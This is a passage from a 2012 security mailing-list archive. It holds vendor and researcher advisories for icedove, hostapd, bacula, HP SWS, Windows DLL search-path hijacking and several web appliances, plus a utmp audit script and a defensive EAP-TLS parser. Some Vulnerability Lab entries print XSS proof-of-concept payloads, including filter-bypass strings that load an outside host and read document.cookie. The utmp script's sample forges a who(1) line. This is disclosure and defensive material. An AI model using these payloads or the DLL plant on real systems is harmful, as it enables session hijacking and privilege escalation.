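            "ut_id": _cstr(f[3]), "ut_user": _cstr(f[4]), "ut_host": _cstr(f[5]),
            "ut_tv_sec": f[9],
        })
    return records


def suspicious_hosts(records):
    """Return login records whose ut_host cannot be a real hostname or address.

    who(1) prints ut_host verbatim, so a newline in the field yields a second,
    entirely forged output line; tabs, ESC, spaces and parentheses are likewise
    never part of a legitimate host string.
    """
    flagged = []
    for rec in records:
        if rec["ut_type"] != USER_PROCESS:
            continue
        host = rec["ut_host"]
        if any(ord(c) < 0x20 or ord(c) == 0x7F or c in " ()" for c in host):
            flagged.append(rec)
    return flagged


def make_record(user, line, host, pid=1000, tv_sec=0):
    """Build one USER_PROCESS record in the layout above (constructed test data)."""
    return UTMP_STRUCT.pack(
        USER_PROCESS, pid, line.encode(), line[-4:].encode(), user.encode(),
        host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0,
    )


# Constructed sample image: one ordinary session and one with the forged host
# string from the demo above (a newline followed by a fake "r00t" who(1) line).
SAMPLE_UTMP = (
    make_record("psz", "pts/29", "xyz", pid=4242, tv_sec=1349315280)
    + make_record("psz", "pts/30", "xyz)\nr00t pts/0    Jan  1 01:02 (xyz.com",
                  pid=4243, tv_sec=1349315300)
)

if __name__ == "__main__":
    # Audit the utmp file given on the command line (default /var/run/utmp);
    # fall back to the constructed sample when it cannot be read.
    path = sys.argv[1] if len(sys.argv) > 1 else "/var/run/utmp"
    try:
        with open(path, "rb") as fh:
            records = parse_utmp(fh.read())
    except OSError:
        records = parse_utmp(SAMPLE_UTMP)
    for rec in suspicious_hosts(records):
        print(f"{rec['ut_user']} on {rec['ut_line']}: suspicious host {rec['ut_host']!r}")
```

The check only catches hosts that are syntactically impossible; a plausible-looking but false hostname written through utempter is indistinguishable from a real one at the utmp level, which is the point of the bug report.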


[SECURITY] [DSA 2556-1] icedove security update

2012-10-09 Thread Nico Golde
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Debian Security Advisory DSA-2556-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
October 07, 2012   http://www.debian.org/security/faq
- -

Package: icedove
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1970 CVE-2012-1972 CVE-2012-1973 CVE-2012-1974
 CVE-2012-1975 CVE-2012-1976 CVE-2012-3959 CVE-2012-3962
 CVE-2012-3969 CVE-2012-3972 CVE-2012-3978

Several vulnerabilities were discovered in Icedove, Debian's version
of the Mozilla Thunderbird mail and news client.

This includes several instances of use-after-free and buffer overflow
issues.  The reported vulnerabilities could lead to the execution of
arbitrary code, and additionally to the bypass of content-loading
restrictions via the location object.

For the stable distribution (squeeze), this problem has been fixed in
version 3.0.11-1+squeeze13.

For the testing distribution (wheezy), this problem has been fixed in
version 10.0.7-1.

For the unstable distribution (sid), this problem has been fixed in
version 10.0.7-1.


We recommend that you upgrade your icedove packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBxgBYACgkQHYflSXNkfP/atwCdHvj3GEdMpuKBnJBRMifhMN1x
cAEAoKUEtqabMm9ZG+slbnGUCojje+4y
=r4vj
-----END PGP SIGNATURE-----



[SECURITY] [DSA 2557-1] hostapd security update

2012-10-09 Thread Nico Golde
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Debian Security Advisory DSA-2557-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
October 08, 2012   http://www.debian.org/security/faq
- -

Package: hostapd
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4445

Timo Warns discovered that the internal authentication server of hostapd,
a user space IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP Authenticator,
is vulnerable to a buffer overflow when processing fragmented EAP-TLS
messages.  As a result, an internal overflow checking routine terminates
the process.  An attacker can abuse this flaw to conduct denial of service
attacks via crafted EAP-TLS messages prior to any authentication.

For the stable distribution (squeeze), this problem has been fixed in
version 0.6.10-2+squeeze1.

For the testing (wheezy) and unstable (sid) distributions, this problem
will be fixed soon.


We recommend that you upgrade your hostapd packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBykZ8ACgkQHYflSXNkfP8KMwCgrZevrVOPeI76Vm4q6LfvTMLi
bJsAoKp8uuLyBRYI1JewUwPrWTFtdr3c
=VOSf
-----END PGP SIGNATURE-----



[PRE-SA-2012-07] hostapd: Missing EAP-TLS message length validation

2012-10-09 Thread Timo Warns
PRE-CERT Security Advisory
==

* Advisory: PRE-SA-2012-07
* Released on: 8 October 2012
* Affected product: Hostapd 0.6 - 1.0
* Impact: denial of service
* Origin: specially crafted EAP-TLS messages
* CVSS Base Score: 7.8
Impact Subscore: 6.9
Exploitability Subscore: 10
  CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:C)
* Credit: Timo Warns (PRESENSE Technologies GmbH)
* CVE Identifier: CVE-2012-4445


Summary
---

The internal EAP authentication server of hostapd does not sufficiently
validate the message length field of EAP-TLS messages, which can be
exploited for a denial-of-service via specially crafted EAP-TLS messages
(before authentication).

Hostapd has a function eap_server_tls_process_fragment() used by its
internal EAP authentication server for handling fragmented EAP-TLS
messages. The function (indirectly) calls wpabuf_overflow() aborting
the application in case of potential buffer overflows. Such a situation
can be triggered by an attacker sending an EAP-TLS message with

a) the More Fragments flag set and
b) a TLS Message Length value that is smaller than the size of
   the TLS Data field.

The vulnerability can be exploited only if hostapd is configured to use
its internal EAP authentication server, either directly for IEEE 802.11x
or when using hostapd as a RADIUS authentication server. 

Affected is hostapd in versions 0.6 - 1.0. The issue was introduced with
commit
http://hostap.epitest.fi/gitweb/gitweb.cgi?p=hostap.git;a=commitdiff;h=34f564dbd5168626da55a7119b04832e98793160
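
As an added illustration that is neither hostapd's code nor the patch referenced below, the Python below models the fragment handling the advisory describes: the EAP-TLS flags L/M/S from RFC 5216, the optional 4-byte TLS Message Length, and the check that refuses condition a) + b) above (More Fragments set while the announced length is smaller than the data already present) before anything is buffered. Continuation fragments are bounded by the announced total as well. Function and field names are the example's own, and the fragments it feeds itself are constructed.

```python
import struct

# EAP-TLS flags (RFC 5216, section 3.1); the TLS Message Length is present only when L is set.
FLAG_LENGTH_INCLUDED = 0x80  # L
FLAG_MORE_FRAGMENTS = 0x40   # M
FLAG_START = 0x20            # S


def build_eap_tls_payload(data, more=False, total_len=None):
    """Build the EAP-TLS payload (the bytes after the EAP Type octet); constructed test input."""
    flags = (FLAG_MORE_FRAGMENTS if more else 0) | (FLAG_LENGTH_INCLUDED if total_len is not None else 0)
    head = bytes([flags])
    if total_len is not None:
        head += struct.pack(">I", total_len)
    return head + data


class EapTlsReassembler:
    """Reassembles fragmented EAP-TLS messages with the bounds checks the advisory calls for."""

    def __init__(self, max_message_len=64 * 1024):
        self.max_message_len = max_message_len
        self._buf = None        # bytearray while a fragmented message is in flight
        self._expected = 0      # TLS Message Length announced by the first fragment

    def _reset(self):
        self._buf = None
        self._expected = 0

    def process_fragment(self, payload):
        """Return ("done", message), ("more", None) or ("error", reason)."""
        if not payload:
            return "error", "empty payload"
        flags = payload[0]
        pos = 1
        tls_len = None
        if flags & FLAG_LENGTH_INCLUDED:
            if len(payload) < 5:
                return "error", "truncated TLS Message Length field"
            tls_len = struct.unpack(">I", payload[1:5])[0]
            pos = 5
        data = payload[pos:]

        if self._buf is None:
            if not (flags & FLAG_MORE_FRAGMENTS):
                # Single-fragment message: an announced length, if any, must match the data.
                if tls_len is not None and tls_len != len(data):
                    return "error", "TLS Message Length does not match data"
                return "done", data
            if tls_len is None:
                return "error", "fragmented message without TLS Message Length"
            if tls_len > self.max_message_len:
                return "error", "announced TLS Message Length too large"
            # Condition a) + b) from the advisory: M set and the announced length smaller
            # than the TLS Data already present. A reassembly buffer sized from tls_len
            # would be overrun by this copy; it is refused before anything is buffered.
            if len(data) > tls_len:
                return "error", "fragment larger than announced TLS Message Length"
            self._buf = bytearray(data)
            self._expected = tls_len
            return "more", None

        # Continuation fragment: every append stays within the announced total.
        if len(self._buf) + len(data) > self._expected:
            self._reset()
            return "error", "fragments exceed announced TLS Message Length"
        self._buf += data
        if flags & FLAG_MORE_FRAGMENTS:
            return "more", None
        if len(self._buf) != self._expected:
            self._reset()
            return "error", "message shorter than announced TLS Message Length"
        message = bytes(self._buf)
        self._reset()
        return "done", message


if __name__ == "__main__":
    crafted = build_eap_tls_payload(b"A" * 20, more=True, total_len=10)
    print("crafted fragment:", EapTlsReassembler().process_fragment(crafted))
    r = EapTlsReassembler()
    print(r.process_fragment(build_eap_tls_payload(b"A" * 10, more=True, total_len=16)))
    print(r.process_fragment(build_eap_tls_payload(b"B" * 6)))
```

Rejecting the fragment with an error return, rather than aborting the process, is what turns the pre-authentication crash into a logged, ignorable bad packet; the peer simply does not get authenticated.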


Solution


A patch is available at
http://w1.fi/gitweb/gitweb.cgi?p=hostap.git;a=commitdiff;h=586c446e0ff42ae00315b014924ec669023bd8de


References
--

When further information becomes available, this advisory will be
updated. The most recent version of this advisory is available at:

http://www.pre-cert.de/advisories/PRE-SA-2012-07.txt


Contact


PRE-CERT can be reached under prec...@pre-secure.de. For PGP key
information, refer to http://www.pre-cert.de/.


Interspire Email Marketer v6.0.1 - Multiple Vulnerabilities

2012-10-09 Thread Vulnerability Lab
Title:
==
Interspire Email Marketer v6.0.1 - Multiple Vulnerabilities


Date:
=
2012-10-02


References:
===
http://www.vulnerability-lab.com/get_content.php?id=710


VL-ID:
=
710


Common Vulnerability Scoring System:

8.3


Introduction:
=
Our all-in-one email marketing software includes everything you need to create, send, track and profit from email marketing - but it doesn't stop there. It also includes powerful tools to completely automate your follow up marketing and customer feedback loops too: Follow up with prospects automatically using autoresponders. Send a series of personalized email messages to new leads at intervals you define. It's like having your own dedicated sales team working for you around the clock. Optimize your email click thru rates with split testing. Send a few variations of your email to a sample of your list and have the best performing one sent to the rest automatically. Automate your list management with triggers. Automatically convert leads to opportunities when they open a specific email, remove inactive leads from your list or even send a follow up email when a particular link is clicked - automatically. Keep your lists clean and up to date with automated bounce processing. Invalid email addresses can be removed from your list automatically based on smart bounce rules, helping keep your deliverability rate high.

See the complete activity of a lead with event logging. Every time a lead opens your email, clicks a link or performs any other activity, it's logged against their history, making it easy for your sales team to qualify their desire to purchase. Solicit and track feedback with surveys. NEW! Using the drag & drop editor you can create customized surveys and feedback forms which you can link to from your email campaigns or autoresponders and then blast to your list in minutes.

(Copy of the Vendor Homepage: http://www.interspire.com/emailmarketer/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in Interspire Email Marketer 6.0.1, Email Marketing Software. 


Report-Timeline:

2012-10-02: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Interspire
Product: Email Marketer v6.0.1


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

1.1
A SQL Injection vulnerability is detected in the Interspire Email Marketer v6.0.1, Email Marketing Software.
The vulnerability allows an attacker (remote) or a local low privileged user account to execute SQL commands on the affected application dbms. The SQL injection vulnerability is located in the dynamiccontenttags file with the bound vulnerable id parameter. Successful exploitation of the vulnerability results in dbms & application compromise. Exploitation requires no user interaction & no privileged user account.

Vulnerable File(s):
[+] index.php

Vulnerable Module(s):
[+] ID

Vulnerable Parameter(s):
[+] dynamiccontenttags


1.2
Multiple persistent input validation vulnerabilities are detected in the Interspire Email Marketer v6.0.1, Email Marketing Software. 
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the user account, user groups, contacts, email campaigns or recent activity module with the bound vulnerable fullname, groupname, email, content block name and activitylog parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction & a privileged web application user account.


Vulnerable Module(s):
[+] Users & Groups - Create a user account
[+] Users & Groups - Create a user group
[+] Contacts - Add contact
[+] Email Campaigns - Dynamic Content Tags - Create a 
Dynamic Content Tag
[+] Recent Activity


Vulnerable Parameter(s):
[+] Full Name 
[+] Group Name
[+] Email Address
[+] Content Block name
[+] All recent activities get executed in the recent 
activity box 


1.3
A non-persistent cross site scripting vulnerability is detected in the Interspire Email Marketer v6.0.1, Email Marketing Software.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or a local low privileged user account. The vulnerability is located in the dynamiccontenttags module with the bound vulnerable action parameter. Successful 

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab
Title:
==
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities


Date:
=
2012-09-30


References:
===
http://www.vulnerability-lab.com/get_content.php?id=579


VL-ID:
=
579


Common Vulnerability Scoring System:

4


Introduction:
=
The GTA family of Internet security firewall UTM systems has been expanded to 
include three new gigabit appliances. 
The GB-2500 Firewall UTM Appliance is one of GTA's most capable firewalls, 
designed for businesses with extensive 
network demands. Featuring a powerful Intel Dual-Core processor, two gigabits 
of RAM and four gigabits of static
 memory, the GB-2500 easily handles intensive, resource-demanding network 
configurations. The GB-2100 Firewall UTM 
Appliance provides robust protection and network reliability for SME 
organizations. Featuring flexible configuration 
options, straightforward implementation and uncomplicated maintenance and 
monitoring, the GB-2100 presents 
comprehensive protection that is adaptable to any network environment. The 
GB-820 Firewall UTM Appliance is designed 
for smaller offices, providing gigabit performance with all the features and 
tools available in larger appliances, 
but in a space-saving desktop unit. Built-in VPN acceleration provides the 
GB-820 with increased throughput, allowing 
organizations to easily handle periods of increased VPN activity.

All GTA Firewall UTM Appliances include our advanced firewall features - policy 
based NAT, virtual hosting via IP 
Aliasing, advanced routing such as BGP and Single-Sign on authentication - at 
no extra charge. Threat management 
features include DoS and an Intrusion Prevention System (IPS), basic content 
filtering and advanced email gateway features.

(Copy of the Vendor Homepage: http://www.gta.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
Vulnerabilities in the GTA UTM Firewall Firmware GB 6.0.3.


Report-Timeline:

2012-05-20: Researcher Notification  Coordination
2012-05-21: Vendor Notification
2012-06-04: Vendor Response/Feedback
2012-**-**: Vendor Fix/Patch
2012-10-01: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Global Technology Associates Inc
Product: UTM Firewall Appliance Application vGB 6.0.3


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the GTA UTM Firewall Appliance Application Firmware GB 6.0.3.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The first vulnerability is located in the user remote password and pre-shared secret input fields & user account output listing. The second vulnerability is located in the VPN Certificate emailAddress & subject, with effect on the VPN Details Listing section. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin), persistent phishing & stable (persistent) context manipulation in vulnerable modules or bound application sections. Exploitation requires low user interaction & a privileged application account.


Vulnerable Module(s):
[+] Users - [Configure - Accounts - Users] > Remote Access > L2TP / PPTP > Remote Password
[+] Users - [Configure - Accounts - Users] > Mobile IPSEC > Modify > ASCII > Pre-shared Secret
[+] VPN Certificate - Input & Listing


Picture(s):
../1.png
../2.png


Video(s):
../gta-waf.wmv


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote attackers with a privileged user account & low required user interaction. For demonstration or reproduce ...

Note:
To bypass the invalid argument filter exception, use an onload iframe to request your external content with cookies. Standard frames and script tags with double quotes will be blocked by the invalid argument exception & validation. To verify the bypass, use also the wrong standard strings for the invalid argument validation.


Locations:  remotePW_hidden, identity, form input desc, 
fullName, Pre-shared Secret,  emailAddress
Good Example Bypass String: x src=http://www.vuln-lab.com 
onload=alert(GTA)  or x src=http://www.vuln-lab.com 
onload=alert(document.cookie) 
Wrong Example Bypass String:iframe src=http://google.com or 
scriptalert(TEST)/script


Review: Users - [Configure - Accounts - Users] > Remote Access > L2TP / PPTP - Password

<input name="edit" value="0" type="hidden"><input name="row" value="0" type="hidden"><input id="objRows" name="objRows" value="1" type="hidden"><input id="saltedPW" name="saltedPW" value="$1$_J9..Zyn$m..Jp/6/lNxwLbwRmteT11"

Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab
Title:
==
Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities


Date:
=
2012-10-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=571


VL-ID:
=
571


Common Vulnerability Scoring System:

5


Introduction:
=
Endpoint Protector 4 protects your network from the threats posed by portable storage devices. Portable devices such as USB flash drives and smartphones may cause severe issues when it comes to controlling data use within and outside the company. As a full DLP product, Endpoint Protector 4 prevents users from taking unauthorized data outside the company or bringing potentially harmful files on USB devices, files which can have a significant impact on your network’s health.

(Copy of the Vendor Homepage: 
http://www.endpointprotector.com/products/endpoint_protector )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Endpoint Protector v4.0.4.0 Appliance.


Report-Timeline:

2012-05-13: Researcher Notification  Coordination
2012-05-15: Vendor Notification
2012-05-20: Vendor Response/Feedback
2012-**-**: Vendor Fix/Patch
2012-10-01: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Endpoint
Product: Protector v4.0.4.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the Endpoint Protector v4.0.4.0 Appliance Application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction. The bug is located in the listing of the username & description result pages. The bug affects all result listings inside the application and all username and description input fields. Another issue is located in the Domain Controller Name of the Directory Service & in the name, host and description of the department or snapshot configuration.


Vulnerable Module(s):
[+] Directory Service > Active Directory Import, Active Directory Deployment > AD Sync > Domain Controller Server Name
[+] EndPoint Management > Users, Groups, Computers & Devices > Username, First Name, Last Name, Department, Phone & E-mail
[+] System Maintenance > System Snapshots > List Available Snapshots > Name & Description
[+] System Configuration > System Departments > Edit Department > Name & Description


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with a low privileged user account or via medium or high required user interaction.
For demonstration or reproduce ...

Review: Groups Management Listing

<tr class="sf_admin_row_0_hover" style="border-left: 1px solid rgb(239, 239, 239);" onmouseover="this.className='sf_admin_row_0_hover'" onmouseout="this.className='sf_admin_row_0'" onmouseup="whichButton(event, this, 'id', '4' );return false">
  <td><iframe src="Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-Dateien/a.htm" onload='alert("VL")'></td>
<td>[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!]</td>
<td>Taylor</td>
<td>Default Department</td>
<td></td>
<td></td>
<td>13-May-2012 05:08:24</td>
<td>demo</td>


Review: User Management Listing

<tr class="sf_admin_row_1_hover" style="border-left: 1px solid rgb(239, 239, 239);" onmouseover="this.className='sf_admin_row_1_hover'" onmouseout="this.className='sf_admin_row_1'" onmouseup="whichButton(event, this, 'id', '4' );return false">
  <td>bla</td>
<td><iframe src="Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-2-Dateien/index.htm"></td>
<td>[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!]</td>
<td>Default Department</td>
<td></td>
<td></td>
<td>13-May-2012 05:19:02</td>
<td>test</td>
  <td>



Review: Active Directory Import - Domain Controller Name

  <div id="ext-genlist4" class="x-panel-bwrap">
    <div class="x-panel-ml">
      <div class="x-panel-mr">
        <div class="x-panel-mc">
          <div style="width: 100%;height:300px" id="ext-genlist5" class="x-panel-body">
            <div style="height:270px;display:block" align="left">

            <div class="form-row">
              <label for="active_directory_server_name" style="width: 250px">Domain Controller Server Name:</label>
              <div class="content">
                <input name="active_directory[domaincontroller]" type="text"><iframe src="Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-6-[PERSISTENT SCRIPT CODE CONTEXT 

[SECURITY] [DSA 2558-1] bacula security update

2012-10-09 Thread Raphael Geissert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Debian Security Advisory DSA-2558-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
October 08, 2012   http://www.debian.org/security/faq
- -

Package: bacula
Vulnerability  : information disclosure
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2012-4430

It was discovered that bacula, a network backup service, does not
properly enforce console ACLs. This could allow information about
resources to be dumped by an otherwise-restricted client.

For the stable distribution (squeeze), this problem has been fixed in
version 5.0.2-2.2+squeeze1.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 5.2.6+dfsg-4.

We recommend that you upgrade your bacula packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBy7koACgkQYy49rUbZzlqFAgCfSghGpcJLbh5vwt37gaZxTSuR
V24An36o7E9NQuuPzYBCSevdEFWCrZud
=DEqg
-----END PGP SIGNATURE-----



[security bulletin] HPSBOV02822 SSRT100966 rev.1 - HP Secure Web Server (SWS) for OpenVMS, Remote Denial of Service (DoS), Unauthorized Access, Disclosure of Information

2012-10-09 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03517954

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03517954
Version: 1

HPSBOV02822 SSRT100966 rev.1 - HP Secure Web Server (SWS) for OpenVMS, Remote
Denial of Service (DoS), Unauthorized Access, Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-10-08
Last Updated: 2012-10-08

Potential Security Impact: Remote Denial of Service (DoS), unauthorized
access, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP Secure Web Server
(SWS) for OpenVMS. The vulnerabilities could be remotely exploited to create
a Denial of Service (DoS), unauthorized access, or unauthorized disclosure of
information.

References: CVE-2011-0419, CVE-2011-1928, CVE-2011-3192, CVE-2011-3368,
CVE-2011-3607, CVE-2011-4317, CVE-2012-0031

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Secure Web Server (SWS) for OpenVMS V2.2 and earlier.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-0419(AV:N/AC:M/Au:N/C:N/I:N/A:P)   4.3
CVE-2011-1928(AV:N/AC:M/Au:N/C:N/I:N/A:P)   4.3
CVE-2011-3192(AV:N/AC:L/Au:N/C:N/I:N/A:C)   7.8
CVE-2011-3368(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
CVE-2011-3607(AV:L/AC:M/Au:N/C:P/I:P/A:P)   4.4
CVE-2011-4317(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2012-0031(AV:L/AC:L/Au:N/C:P/I:P/A:P)   4.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following software update available to resolve these
vulnerabilities.

HP Secure Web Server (SWS) for OpenVMS V2.2 Update 2 is available at
http://h71000.www7.hp.com/openvms/products/ips/apache/csws_patches.html for
the following platforms:

Platform
 Kit Name

OpenVMS Integrity servers
 HP-I64VMS-CSWS22_UPDATE-V0200--4.PCSI_SFX_I64EXE

OpenVMS Alpha servers
 CPQ-AXPVMS-CSWS22_UPDATE-V0200--4.PCSI_SFX_AXPEXE

HISTORY
Version:1 (rev.1) - 8 October 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBzDiMACgkQ4B86/C0qfVn4CQCgwYRZZOUW3QOe8sH+dY5X28GO

Privilege Escalation Vulnerability in Microsoft Windows

2012-10-09 Thread advisory
Advisory ID: HTB23108
Product: Microsoft Windows
Vendor: Microsoft Corporation
Vulnerable Version(s): Windows Vista, Windows Server 2008, Windows 7, Windows 8 
RP
Tested Version: Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 
Professional SP1, Windows 8 RP
Vendor Notification: August 7, 2012 
Public Disclosure: October 9, 2012 
Vulnerability Type: Uncontrolled Search Path Element [CWE-427]
CVSSv2 Base Score: 6 (AV:L/AC:H/Au:S/C:C/I:C/A:C)
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab has discovered a vulnerability in 
Microsoft Windows which could be exploited to escalate privileges under certain 
conditions.

The vulnerability exists due to the “IKE and AuthIP IPsec Keying Modules” 
system service, which tries to load the “wlbsctrl.dll” DLL, a file that is 
missing after a default Windows installation.
The “IKE and AuthIP IPsec Keying Modules” service starts automatically in the 
default configuration (after a default installation) of:

 - Microsoft Windows Vista
 - Microsoft Windows 2008 
 - Microsoft Windows 7
 - Microsoft Windows 8 Release Preview

Moreover, the service runs with SYSTEM privileges by default. Therefore an 
unprivileged local user who has write access to any default or other search 
PATH location can execute arbitrary code on the vulnerable system with the 
privileges of the SYSTEM account.


Vulnerability Details

The “IKE and AuthIP IPsec Keying Modules” service tries to load the 
“wlbsctrl.dll” library, which is missing. This forces Microsoft Windows to fall 
back to the search PATH procedure to locate the missing dynamic-link file, in 
the following order described by Microsoft at 
http://msdn.microsoft.com/en-us/library/windows/desktop/ff919712%28v=vs.85%29.aspx
 - The directory from which the application loaded
 - The system directory
 - The 16-bit system directory
 - The Windows directory
 - The current directory
 - The directories that are listed in the PATH environment variable

When a directory is created in the C:\ root folder, access permissions for files 
and subfolders are inherited from the parent directory. By default, members of 
the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA 
privileges on all directories created within the C:\ root folder. This also 
applies to folders created by an application's installer. The vulnerability is 
introduced to the system when software does not change the default permissions 
of its installation directory and adds its installation path to the PATH system 
environment variable. Any member of the Authenticated Users group can then place 
a malicious file named “wlbsctrl.dll” into that folder and execute arbitrary 
code on the system after a simple reboot.

Brief research confirmed that the following well-known software makes the 
weakness exploitable when installed into the C:\ root folder:

 - ActivePerl 5.16.1.1601 (default installation)
Adds to the PATH variable: C:\Perl\Site\bin;

 - ActiveTcl 8.5.12 (default installation)
Adds to the PATH variable: C:\TD\bin

 - ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but 
can be manually activated)
Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts;

 - Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, 
but can be manually activated)
Adds to the PATH variable: C:\Ruby193\bin;

 - PHP 5.3.17 (option to modify the PATH variable is inactive, but can be 
manually activated; must be explicitly configured to be installed into C root 
folder, e.g. C:\PHP)
Adds to the PATH variable: C:\PHP\;

 - Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C 
root folder, e.g. C:\Zend)
Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin

 - MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be 
manually activated; must be explicitly configured to be installed into C root 
folder, e.g. C:\MySQL)
Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin


Attack vectors

Any member of the Authenticated Users group can escalate their privileges to 
SYSTEM when the following conditions are met:
1. The above-mentioned software sets insecure permissions on its installation 
folder (that is, the folder is writable by members of the Authenticated Users group).
2. The above-mentioned software adds its installation path to the system PATH 
environment variable.
